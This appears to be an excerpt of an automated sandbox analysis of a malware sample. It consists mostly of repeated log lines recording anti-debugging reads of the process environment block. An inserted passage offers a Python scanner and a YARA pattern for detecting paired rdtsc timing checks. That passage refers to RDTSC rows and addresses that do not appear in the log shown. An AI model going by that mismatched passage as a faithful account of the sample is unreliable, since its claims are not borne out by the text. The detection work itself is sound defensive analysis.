          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B44015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B44015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B32073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B41074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A90050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A90050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A9C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AAA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A94120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A9B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A9B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AAFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AAD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AAD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A88A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A93A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A75210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B2B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B2B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B48A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B3EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B04257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B45BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A81B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A81B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B2D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B3138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AAB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A9DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B3131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B48B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B48CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B4740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B4740D mov eax, dword ptr fs:[00000030h]
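The RDTSC rows above record the exact timing probe: two rdtsc instructions six bytes apart, with xor ecx, ecx / add ecx, eax between them to keep the first reading, so the code can compare the two counter values and treat a large gap as a sign of instrumentation. Two rdtsc reads that close together are rare in ordinary code, which makes the pair itself a usable static signature. The block below is an added example, not code from the report or the sample: a byte-level scanner for rdtsc pairs within a short window, plus the equivalent YARA hex string. The code buffer is constructed; the xor/add encodings used in it (33 C9, 03 C8) are one valid choice for the instructions the report names, not bytes taken from the sample.

```python
"""Static scan for the paired-RDTSC timing check the report records at
0x4085E4 and 0x40897E (rdtsc; xor ecx, ecx; add ecx, eax; rdtsc).
Added example, not from the sandbox; the code bytes below are constructed."""
import re

RDTSC = b"\x0f\x31"  # opcode of the rdtsc instruction


def find_rdtsc_pairs(code: bytes, window: int = 16):
    """Return (first, second) byte offsets for each rdtsc that is followed by
    another rdtsc with at most `window` bytes between them. Only consecutive
    rdtsc occurrences are paired, so three close reads yield two pairs."""
    offsets = [m.start() for m in re.finditer(re.escape(RDTSC), code)]
    pairs = []
    for first, second in zip(offsets, offsets[1:]):
        gap = second - (first + len(RDTSC))
        if gap <= window:
            pairs.append((first, second))
    return pairs


def describe(code: bytes, window: int = 16):
    """Human-readable lines for each pair, as a triage note would print them."""
    return [f"rdtsc pair at 0x{a:X}/0x{b:X} ({b - a - len(RDTSC)} bytes between)"
            for a, b in find_rdtsc_pairs(code, window)]


def yara_hex_pattern(window: int = 16) -> str:
    """The same heuristic as a YARA hex string, e.g. '{ 0F 31 [0-16] 0F 31 }'."""
    return "{ 0F 31 [0-%d] 0F 31 }" % window


# Constructed bytes: nop padding, then the report's sequence
# rdtsc / xor ecx,ecx / add ecx,eax / rdtsc at offset 0x10, more padding,
# and a lone rdtsc at 0x40 that must not be paired under the default window.
SAMPLE_CODE = (
    b"\x90" * 0x10
    + b"\x0f\x31" + b"\x33\xc9" + b"\x03\xc8" + b"\x0f\x31"
    + b"\x90" * (0x40 - 0x18)
    + b"\x0f\x31"
    + b"\xc3"
)

if __name__ == "__main__":
    for line in describe(SAMPLE_CODE):
        print(line)
    print(yara_hex_pattern())
```

Run against a code section or a dumped image rather than the whole file; the 16-byte window catches the six-byte form seen here and leaves room for a few bookkeeping instructions, while a much wider window starts pairing unrelated timestamp reads.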
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B28DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B48D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AFA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B23D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A97D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B48ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B2FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B2FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA61C mov eax, dword ptr fs:[00000030h]
